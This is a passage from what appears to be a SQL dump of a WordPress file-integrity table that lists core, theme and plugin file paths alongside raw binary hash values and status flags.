8]���_','',0,'?'),('Y(�K���g\0��_��','wp-includes/js/dist/annotations.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;��hZ4�u�R��2%','�)�#ml��[�|w*�CU���8��p+OgI','',0,'?'),('Y+�r�2�Z,$��j��','wp-content/plugins/wp-date-remover/public/js/wp-date-remover-public.js',0,'IΠ���J�(y��ʛ�\"','IΠ���J�(y��ʛ�\"','�9��>#�k�.|J��)\Z}�x���(��$�','',0,'?'),('Y,Qp�gmu#�e���~','wp-includes/widgets/class-wp-nav-menu-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8x$�9�hQ&�','n~��B�Ȳ���|�4�[�U�`\0�2�J۷�','',0,'?'),('Y/�Zެ�CV$1�','wp-content/plugins/wordpress-seo/admin/class-yoast-alerts.php',0,'uC�B<詈v=͟Kإ','uC�B<詈v=͟Kإ','4Q�9��}��B�n�@�fc��z��Y�\Z�','',0,'?'),('Y/�ޑ�	���\Z���','wp-includes/js/dist/escape-html.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�MЎ&I��x܂�.���','9��S_g�2�G���sCqce��nq.=���','',0,'?'),('YBt\n�\nc�ݟ.��vi','wp-content/plugins/wordfence/views/diagnostics/text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�R�<�)��Yf�8�','�,�Iq0\r8i;[K.�4?t�\\.ZH\Z','',0,'?'),('YK�yn���i��~','wp-content/plugins/wp-date-remover/uninstall.php',0,'ʲO�/*hsg���','ʲO�/*hsg���','�L%B�A���<�ha���G��!�A���q','',0,'?'),('YV�2��9}D8�','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_mcrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=on~Z���TOQ�Be','�<�H���\"��F�@����%���1`7<��	��}','',0,'?'),('Y�La���h�(','wp-admin/edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oۖ���e�y�V�Bnt','���p�S��p>�5��\r��+El�VI��5V�','',0,'?'),('Y�7��Tg\rdu4��?','wp-content/themes/lightly/inc/widgets/tabs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^m����Mx����K�','��Ķ�~�OV�1H�i@1�����d�M�a/��/','',0,'?'),('Y�,�e�A��w�`���','wp-includes/images/media/archive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9����h�\0��ì�u','\0�Bb�3��\'��\'��)JG ��](G�9Pr2 s','',0,'?'),('Y��<�]�PS��','wp-content/themes/travelify/templates/template-blog-full-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Iы&аbA�B]`�1','r�a`�՚Y���QZ�N\"cF�-�\Z�>�v','',0,'?'),('Y�+i�Cx�S=�һ�S','wp-content/themes/wen-business/assets/js/navigation.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��mL^~T]����S�','{Ѽ�H����(\"S+D�n}��Q�P�a�8��','',0,'?'),('Y�BWy	+�B�Om�z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#��:��N�\'�Dx��N','�[��_|А�~E����+�~�E�(�`�_��','',0,'?'),('Y�68�H;%,�_c\n�','wp-includes/css/wp-auth-check.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ܭ1�Pv(Oؐ��',';/�Wn4�)�ʺ_mw���`Uȉnai��?�','',0,'?'),('Y�\\�һa1I��>�','wp-content/plugins/unyson/framework/includes/option-types/multi/static/css/styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�1n�[��Kz�-I','��z��/��!ds�����l��3�	pyܻ','',0,'?'),('Y�J+{�o(�A%f�e�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-404.php',0,'$6�w��]�ⰍO�c�G','$6�w��]�ⰍO�c�G','{��wiV�\"ŵ�;a�����:����','',0,'?'),('Y�I,�2$��cXX���','wp-content/themes/fabulous-fluid/images/grid-img10.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l:��{��\'�U��','�v:w9���\\O4q+Xido/��o�Ƭ!}	.','',0,'?'),('Y�J��|��[D��y�Y','wp-content/plugins/wordfence/waf/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E\"xK��{�8�dS�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),('Y����]���ŞI���','wp-includes/js/jquery/ui/effect-slide.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;I^�\Z+:C��)H[','Y��� �%��!���d!F��r`�݀��4','',0,'?'),('Y֝��U����}�r/','wp-includes/SimplePie/Cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	��~ܯ{ʹ���+h�','�md�����n�nun�pU0 l��6���Zi�R','',0,'?'),('Y�UL�5J�ޔ�v[�','wp-includes/rest-api/search/class-wp-rest-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��x&����{\n�x�\\','�sޢ���zj�λ�\'Ҳ���wE�?��','',0,'?'),('Y�\rG��x—4Q��F�','wp-content/themes/accelerate/page-templates/business.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t�I��%^��Xvh�I','���f���I���P��\"QH�ն�v���	','',0,'?'),('Y�.�塓�Kt��','wp-content/themes/panoramic/library/template-parts/header-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�6�Dr����hw�','��|4���N�?%��o//	��ě�;��Z+z�','',0,'?'),('Zx����n41縦�','wp-content/themes/vega/parts/banner-featured-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F5�s^���t��x�,','j\"%`�Qz�q�\'Fz�5�p�nw���','',0,'?'),('Z�w�U>���AD\"L��','wp-content/plugins/all-in-one-wp-migration/lib/view/main/get-support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ҝ=P��gW\"m�OS','x�1�uY$�\\S�b�߭I���k:s[\0Kw?��','',0,'?'),('Z4<n?e�����','wp-content/plugins/wordfence/lib/wfConfig.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r����k�P$f��','�ڷ�s,9��a�a�8�ˬ�<�+��p�ql�','',0,'?'),('Z9���}.��J��k=�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8I��\Z\n�ӣ�','i>z���R�@������k�W��6u�k�y�','',0,'?'),('Z>?�1������[�','wp-content/themes/fluida/content/content-notfound.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','󴈦\n{��\0;�Q\nj[','���\\�N\"aK�G��f������cR�','',0,'?'),('ZD�:-h�${�ma�','wp-content/plugins/wordfence/images/sort_desc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?զ�)X�?�N�','b�EԚ�B�#:�(�#�=_(�\Z���|��U�#�','',0,'?'),('ZP�e2I�� ��[͠�','wp-content/themes/twentytwentyone/assets/sass/07-utilities/a11y.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ТWHKC�}��&�%��','��$�FT���~K�K�`��e�c=��;���;','',0,'?'),('Z`g,��\'Go���q�','wp-content/plugins/spam-captcha/core/img/param.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�AYE�Q\n���o�','bH���QV��\n��9sO���׍,���Wr]','',0,'?'),('ZgV`��v��T�RH}��','wp-content/themes/lightly/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eP\"�3�l������','����V��d)2N�9UL�]a���T��%V','',0,'?'),('Zv\0�aј�Ф���0A*','wp-content/themes/morfeu/core/helpers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���4�䵉B^o��+�','�/�X9T��>���z\np�b���md�&���D','',0,'?'),('Zx��1�2K�Z�,��','wp-includes/customize/class-wp-customize-header-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�\0W>$����l�^ҳ','Qy(u�&���v�ӳ\'-�}�hՒ��X��t�','',0,'?'),('ZҌ�[��\nv���	F','wp-includes/SimplePie/gzdecode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��rF<�\ZiǨu��','|��R\'gAE�ێ���q��q�T!��:�O0�_','',0,'?'),('Z�_\"��~�J�����','wp-includes/js/wp-custom-header.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KO��x �3��y;9�','��X$A���\r\"N��e�$ߦ��+���L(','',0,'?'),('Z��?�r�����?','wp-content/themes/fabulous-fluid/images/icon-calander.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(�����.�:D��','���2T����0y�M|R��2��ŀ�ѵW','',0,'?'),('Z��sC�bi���ۻ','wp-content/themes/point/images/728x90.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_>WGn˷��А��t','km�ƃP��ϒQ�K|a��~{y&I��8�','',0,'?'),('Z��я�ݒ��S�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�\Z^Z�HG�%�O�','�m���c�;�\ny㐲��0,�5���F|=�C','',0,'?'),('Z�����:	z��A�','wp-content/themes/panoramic/upgrade/library/images/loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����o������','����/���	9�`c졠�’םU���A�','',0,'?'),('Z����� %/�Z�z9��','wp-admin/includes/taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$�ȓ����ʚ#','�����[�&�%��L�\0�1\n�T�� �>��','',0,'?'),('Z�\0��Y���� æfg','wp-includes/js/crop/marqueeVert.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\0���9��R���','K�cg$�e���2\\p�$�1z�����`CkJ�','',0,'?'),('Z�\\���fK�����','wp-content/plugins/wp-date-remover/includes/class-wp-date-remover.php',0,'��X��\\q�SRu��.�','��X��\\q�SRu��.�','�	/��C�-�N����e����Ÿxz.^�','',0,'?'),('Z��J�����uZp�M','wp-content/themes/supernews/acmethemes/hooks/slider-selection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�Kp0��&@r]','�^Ѧ�O&�9�E��(���b�c%\Z�x��H�W�','',0,'?'),('Z�تCvb`��nd\"','wp-content/themes/nirvana/admin/prototypes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������C���ە5','AK4���^�����,�-P�(OM{����|','',0,'?'),('Z�p�l�؜Kl�\\R\n��','wp-content/themes/barletta/page-fullwidth.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U\r��>�de��ֺO','�x������,��\"+�|G\"A���Q��(','',0,'?'),('Z��\ZE��ڨ���_.��','wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/archiver/class-ai1wm-compressor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0�çKpOҢn�v��','E���}�V���R�G#_�i3����X�','',0,'?'),('Z��7#�$͘��Q`','wp-content/themes/wen-business/assets/css/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U����r���sq�','�>���R������a��>��y\0n�ζ�Ү�','',0,'?'),('Z�u=�7��0�','wp-content/themes/twentytwentyone/assets/sass/03-generic/vertical-margins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����>�����y��','�+a�R�\"�͋kDxgd]��h���E�_#','',0,'?'),('Z�R���r(�&b��:�-','wp-includes/css/dist/format-library/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<��t������-]�v','^aYݳ�F�0���N�ڥw�Ʀ�p���7','',0,'?'),('Z��=ӧ�rc\"��y�','wp-includes/IXR/class-IXR-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��VdB+A�J?��#','��{~�(#�\Z6u����,����?�jk2��`','',0,'?'),('Z�Z5��/���2ut�','wp-content/plugins/spam-captcha/core/img/close_popup.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<O�3�~�	}#�44`','Jd�f��}���/�����a*�\rѾ���[�','',0,'?'),('[���_�� ��]�6�','wp-content/themes/illdy/layout/css/main.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xW&*���\'40%��E','�c�W~�pE$�m�k�m�j��H�{�/rL:','',0,'?'),('[̉��$���\'��','wp-content/themes/twentynineteen/sass/navigation/_next-previous.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ɚ�u\\	���','c�V�����x�y(#il8L}e޷��','',0,'?'),('[5�*Z�������','wp-content/themes/nirvana/admin/images/2cSr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�b�W��^#,X','��t��p��-v�����D��\"���,ώ]�I','',0,'?'),('[��\n:�\"�m2C��','wp-content/plugins/spam-captcha/core/lang/SL_framework-ro_RO.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�řU(b���v��','�E�KH?�+a�4	���X_����`�- �','',0,'?'),('[!��s]�avB:�dҙ','wp-content/themes/vega/assets/fonts/glyphicons-halflings-regular.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!Fh���e�y#�-�e[','����$�6�`�|��y+�^	8c%���k�','',0,'?'),('[���7���*�\06��','wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/class-fw-ext-backups-task-type-image-sizes-restore.php',0,'��^���*��BxHr','��^���*��BxHr','�8��:�h�K3O��7�uA�ۇ�`����\r5','',0,'?'),('[�Uk�٫�c��_c\r','wp-content/themes/morfeu/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r4�Bk)\\+��p%�','G��>���37G{_K�1,���o���d�ys�a�','',0,'?'),('[�G���e�a\'�i��','wp-includes/js/jquery/ui/datepicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4P1,ٝ�`x����','�]w\'��d�<s��6�>4Sڭ���s��/�=��','',0,'?'),('[tK�\n�(:2Y�fķ','wp-content/plugins/unyson/framework/extensions/update/extensions/github-update/class-fw-extension-github-update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� `,�/�F�0M','\r;�vZqy����K�?�u��4�)>{�����','',0,'?'),('[5���Y�Nh���K�M�','wp-includes/customize/class-wp-widget-area-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u�͹�7s�q����','<��v���D~�%�纙�������X<���','',0,'?'),('[?^����,��e�\'�','wp-content/themes/relia/inc/css/bootstrap.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']SW�7��:[�Ү�B','z��ܓ=�gRȯu�*2�����oO:i`\n�̀X','',0,'?'),('[P�@G].�&ag2!�Z','wp-content/themes/sg-window/img/icons/small/linkedin.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v;1���t�^��=V','G:��R�5�6��%z_.�My�y!�P�ë�','',0,'?'),('[_xi!���jPH\Z	�/3','wp-content/themes/precious-lite/js/custom.customize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��22���m ��*e�$','3,t)Xo&�\Z4�U.w�x����-��W�f','',0,'?'),('[cç�/�Ķ�\\�F�N_','wp-content/plugins/all-in-one-wp-migration/lib/view/main/storage-index-php-notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3IQ�5�	�dSf�u�','t��~DĻ��^��,t$o\n�7��jL�U�','',0,'?'),('[j�=��v��I7�e','wp-content/themes/travelify/library/panel/images/left-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���!�w�9��\01/u�@','d�1�LO9��$�V\\��\01�\0�\"d�`$�','',0,'?'),('[t�c{�X9aZ���','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.no.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����|:�����}��','�:�U���n,6���at��sIw�-�','',0,'?'),('[{LF^�+�5x�	�f','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnail-bg.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6K�=��\'����!E','���5��tc�EŹ�Qf�RG$\Z��˙y','',0,'?'),('[~6��Mp�\'���q','wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-wpseo.php',0,'��j��[U��,�gw','��j��[U��,�gw','.�\n����O&���M���\0Ob���9���T�','',0,'?'),('[~j���K��X9���_','wp-content/plugins/all-in-one-wp-migration/lib/model/import/class-ai1wm-import-clean.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�y[&:�+]X>�<','�����R��M]��!����_GO�9o�V��','',0,'?'),('[��#ܧ\Z>]��<�','wp-admin/css/colors/ectoplasm/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���M��J��cLM�','�~�A*Nh��w�$��H�z��÷:�c�h��c','',0,'?'),('[�>�x�;�wn/t�H','wp-includes/js/wp-emoji.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+g�D>�w�f�م*�D','M�aF��$�*�M��_�����n8���v�u�','',0,'?'),('[��$c�qr��9h���','wp-content/plugins/wordfence/js/jquery.qrcode.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Թ���Xp`me<','wP\0�p�zuYDS�z(W�ߥ��P�3$S����','',0,'?'),('[�ݼ�����ɬ�+�','wp-content/plugins/unyson/framework/includes/option-types/typography-v2/static/css/styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�\0mU*�a�L�|��p','�fiߑ!ߚ	�W\\g�)�Xǩ7]�#%Ž	&͆','',0,'?'),('[���1�YAdk�,','wp-includes/SimplePie/Sanitize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�l����fp��x��','���O\nQp���5�A�~������j��xt�','',0,'?'),('[�Y��44�Or��l0�','wp-includes/Requests/Exception/HTTP/414.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]U�@���)��#h','��H������i���c�!��I).eh������','',0,'?'),('[�rN��x���	�K1','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.nameking.php',0,'Z��oX�\'�|���~','Z��oX�\'�|���~','4�X��?��\Z�il��w8D��)��Z��Cu','',0,'?'),('[�ئ�m��Np�h','wp-content/plugins/wordpress-seo/admin/class-yoast-notification-center.php',0,'(��\"�CP���zA�','(��\"�CP���zA�','�~�mpd�د]A�.��a�h���{�\n{','',0,'?'),('[ꠏ�|K�o�یb7�','wp-admin/user/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xCS6�LC�2!�u�','�`K����y2M��plξ\"a\0אּ�t�ޡD','',0,'?'),('\\�%�?�>����e8','wp-includes/class-wp-block-pattern-categories-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g:G��É6�[}�','*�.tr(��s�a[�ǘ�T�p�ALd1�Z��','',0,'?'),('\\\n�;:�I�\"�@�Oh�','wp-content/plugins/contact-form-7/modules/response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�~c\rs\\p.D`/JT','e�s�g%U�dq.�q���T�5B\Z!�','',0,'?'),('\\\r#��Mz�Ӯh&3��U','wp-content/themes/hueman/functions/init-front.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��G_{^�aW{���','��?���ԫ�	���T��꼡XIzl-��\n>','',0,'?'),('\\�����9�����','wp-admin/ms-upgrade-network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qc��8���E�%��!','	�H�_c��Q�X��̤�ՏLs�ڭ�','',0,'?'),('\\(eWY����Z2�\\�','wp-content/plugins/unyson/framework/extensions/shortcodes/includes/shortcode-template-components.php',0,'TrK9������ ��','TrK9������ ��','lb��{g|\'����h�q�ܘ<V�<�ؑ|�y�','',0,'?'),('\\B ����h%(�DXk','wp-content/themes/mh-magazine-lite/js/jquery.slicknav.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��&�|nO^E.�����','3��H�)�1�FC~�H኏����Y�m�V]aݠ','',0,'?'),('\\H���:��u3�%�Fw','wp-content/plugins/wordfence/views/waf/waf-install-success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�2�H���$�\n�','5�(�/��PhJS�Z\"&]}���r�Ip�(�-t��','',0,'?'),('\\[��i%Ͱ<��e�>�','wp-includes/css/wp-pointer-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ր����O!?��','�3�N��\n7���rTT;\"��B�Px��Nmdߩ','',0,'?'),('\\d��1)W��ӄ��D�v','wp-content/themes/clean-magazine/images/gallery/featured4-350x263.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v?VkMDT�B�_��j:','!Ch��Z�B�F�3�Pg;�2��AEU��\'�','',0,'?'),('\\e�!��ӕ�&鐳�','wp-content/plugins/spam-captcha/core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V����*��ڽ��	�D','w�nU�u\Za�v�7�*��Ao,O�u�~�\'','',0,'?'),('\\z	�k-5rY\'iZkS','wp-content/themes/hueman/assets/front/img/demo/1-320x320.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������)O�_�','�b=C5�X&�[+�t&Vա�L��sr�pHP#�\n','',0,'?'),('\\������}�o','wp-content/themes/hueman/functions/class-utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y7cB��~���','9��Č�W�1Is�!�	�zۨ�}�e0:$s��','',0,'?'),('\\������7���Q�o','wp-content/plugins/wordfence/css/images/ui-icons_cc0000_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��%;w���Q�8��@','wi>�6�Ƭ�4��.N�C���\Z�4�IO��','',0,'?'),('\\���5�ȟ��t�8:','wp-content/themes/travelify/library/js/jquery-cloneya.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�˚\n�0�@-���#','����S����(����d�9K�\0\n�[����','',0,'?'),('\\�т�?$�̈́8����','wp-admin/includes/dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Մ$�d&�@|�)�','�Ҽ�W*=@�a�7�\r�;��ާ�?�3','',0,'?'),('\\��u�]�A%� �','wp-content/themes/twentytwenty/package.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yӻ����L&�Cxg|�','�B8}⻙IΥ7\"i����⣶p����w\\','',0,'?'),('\\��K���?����ׄc','wp-content/themes/fabulous-fluid/js/jcf.scrollable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R%���b�2�Xי+4�','/�vF\Z�Ԁ���ђYn\'�l��	8���Y�$xs','',0,'?'),('\\�\0��>�+���Fb��','wp-admin/revision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�U��:#�+a���F','�C���f��`���]����|#wVÉBH)\r','',0,'?'),('\\�T{`(��{�!�$%�','wp-content/themes/fluida/woocommerce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�����.��I\"h�','�k��FD�u�=�ቡ�\0IA��Ӣ*(','',0,'?'),('\\ֶ�S��\n��P�:�','wp-content/themes/twentynineteen/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F��8v�D����','�N�1����1�swR�������������','',0,'?'),('\\�t�X��G)T��F�','wp-content/themes/alpha-store/lib/include-kirki.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,�d�{꽱C:�','d��.�\nE��\rS-����X\r��<���o��fH�','',0,'?'),('\\�k7��Q|K�j$�\r','wp-content/themes/supernews/acmethemes/sidebar-widget/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r��S�^�dLWR�','�~�W+&Y�?��Ǩ��\n_��q^��r��w����','',0,'?'),('\\񯤭{m��������','wp-content/themes/lightly/inc/widgets/recent_comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�	�4o���h��ϖ','��fh�\'��@�\'9�X;��lC����$����','',0,'?'),(']�_�tI1�\r�_�','wp-content/themes/precious-lite/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�g���6�	�M�{','$@��RdC��V2��K�ں�^U�¢����','',0,'?'),(']��np�F�ˑ�-�','wp-content/themes/lightly/js/vendor/html5shiv.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ި஄UPb��t�<','�R�y1N�hu�¿���I}��؞���)i','',0,'?'),(']&��A��!�S�K>�','wp-content/themes/twentytwentyone/assets/images/Reading.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�*���|).��h','��Q�-:�ñ��1Z��ŴCxʞ�dd;Z�b�^','',0,'?'),('](R�&!��1;�3��','wp-includes/js/wp-ajax-response.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���H+�Z�Ǘ�,�','>�����j�e����2�� �A>&���c\n�','',0,'?'),('].zr��1}����b','wp-content/plugins/unyson/framework/includes/option-types/oembed/static/js/oembed.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n��Q��o��’','⩍�����^=B�F}-�MY}��<ư��b�/�','',0,'?'),(']9.�pe���T���','wp-content/themes/twentynineteen/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'&iɴ�G��x��Rl:','�JÂ���W�S��\"�V�JZɌM�ڛ�D','',0,'?'),(']9OUâ��\n��V','wp-content/plugins/wordfence/js/admin.liveTraffic.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڗU�_|�$>���7','wR�u�sXq��s�a�OFvQ�y�Ł#���','',0,'?'),(']?��T�!�\'�T','wp-content/themes/square/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZX(`8�]]������','n8�y�X�Z @Zb�l�N���85ӟ,i}','',0,'?'),(']B#�2�z��bU��/','wp-includes/Text/Diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r� \ZV���:��','�N\'�u�p���=Z�\"-��K����r','',0,'?'),(']L0���eE�\"u� ��','wp-includes/js/mediaelement/mediaelement-migrate.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�OAZ�n�\0��?!*�W�','q�{2�fX�����JgXC����c�Y�3��','',0,'?'),(']OPW�ߕ�8u+k��','wp-content/themes/travelify/library/js/html5.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{zN:!�aԉю� �\0','�(��B5s�TP���<pt%�FI4�L�RZ_��Y','',0,'?'),(']s���[����	.� $','wp-content/plugins/spam-captcha/core/lang/SL_framework-es_GT.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#>�նz��!>y��L','cu�A_y�m�T^�9����y�\n�T��=A�u','',0,'?'),(']s؜�����h��\\','wp-content/themes/barletta/js/jquery.bxslider.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i}i��SV�n8���','&`�^��S~�y������`f�\\���Jq��\\�','',0,'?'),(']��1Ǯp ʏZm!�','wp-content/themes/morfeu/assets/js/main.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q~l�J6?��S2�݆','��G���)j�6�[�Kx����̉8�UI���d$','',0,'?'),(']����ΰ��m','wp-content/themes/twentytwenty/assets/images/2020-landscape-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2������j�^��!��','��)秐=�l2^m�\r���uV20�ژM{�','',0,'?'),(']���]���o��?','wp-content/plugins/wordpress-seo/admin/views/tabs/sitemaps/post-types.php',0,'cg�^\n���3�@u','cg�^\n���3�@u','Ck^��\0���:����+C4�SJ3�p�14-�d','',0,'?'),(']���N��Jjӎe���','wp-includes/widgets/class-wp-widget-media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<m�W�~�E�V�܁�u','�0�{�����H|��f�V���J ȵ��~�Q��','',0,'?'),(']����.�~,3�x�R�','wp-content/themes/panoramic/customizer/styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/\'u�\'m��ٸj�','^��{0_��(+j�3���ft̀t1�3��','',0,'?'),(']��xX����q��